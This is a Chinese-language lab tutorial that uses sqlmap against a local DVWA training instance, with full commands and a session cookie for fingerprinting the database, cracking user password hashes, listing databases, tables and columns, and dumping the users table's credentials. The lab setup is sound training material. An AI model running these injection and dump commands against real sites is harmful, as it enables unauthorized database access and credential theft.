實戰
實戰1:枚舉登錄MYSQL數據的用戶名與密碼
實戰2:枚舉所有數據庫
實戰3:枚舉指定數據庫的數據表
實戰4:獲取指定數據庫和表中所有列的信息
實戰5:枚舉指定數據表中的所有用戶名與密碼
環境準備:
1)登錄http://192.168.1.124/DVWA-1.9,將安全級別設置爲最低;
2)開啓Firefox瀏覽器TamperData插件,等待獲取cookies值;
3)在【SQL Injection】項中,提交User ID爲22(地址欄出現id=22,這就是MySQL的注入點)
獲得注入點:http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#
4)TamperData彈窗獲取cookies值:security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552
實戰1:枚舉登錄MYSQL數據的用戶名與密碼
sqlmap語法參數:
-
-u :指定目標URL,即注入點
-
--cookies:當前會話的cookies值
-
-b:獲取數據庫類型,檢索數據庫管理系統標識
-
--current-db:獲取當前數據庫
-
--current-user:獲取當前登錄數據庫使用的用戶
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' -b --current-db --current-user
說明:根據提示回覆Y,繼續
結果:得到當前數據庫爲dawa,使用的用戶爲root@localhost
實戰2:枚舉所有數據庫
sqlmap語法參數:
-
--users:枚舉數據庫用戶名
-
-password:枚舉數據庫用戶的密碼(hash)
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --users --password
說明:選擇目錄下字典文件,暴力破解
結果:數據庫用戶名爲root,密碼也有明文形式123456
實戰3:枚舉數據庫和指定數據庫的數據表
sqlmap語法參數:
-
--dbs:枚舉當前數據庫
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" --dbs
結果:mysql下所有的數據庫
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa --tables
結果:dvwa庫中,所有的表
實戰4:獲取指定數據庫和表中所有列的信息
sqlmap語法參數:
-
-D:指定的數據庫
-
-T:指定數據庫中的數據表
-
--columns:獲取列的信息
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users --columns
結果:dvwa庫,users表中所有字段信息
實戰5:枚舉指定數據表中的所有用戶名與密碼
sqlmap語法參數:
-
-C:枚舉數據表中的列
-
--dump:存儲數據表項
命令:
sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh5g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump
結果:dvwa庫,users表中user字段和password字段信息,最後表中信息轉存文件中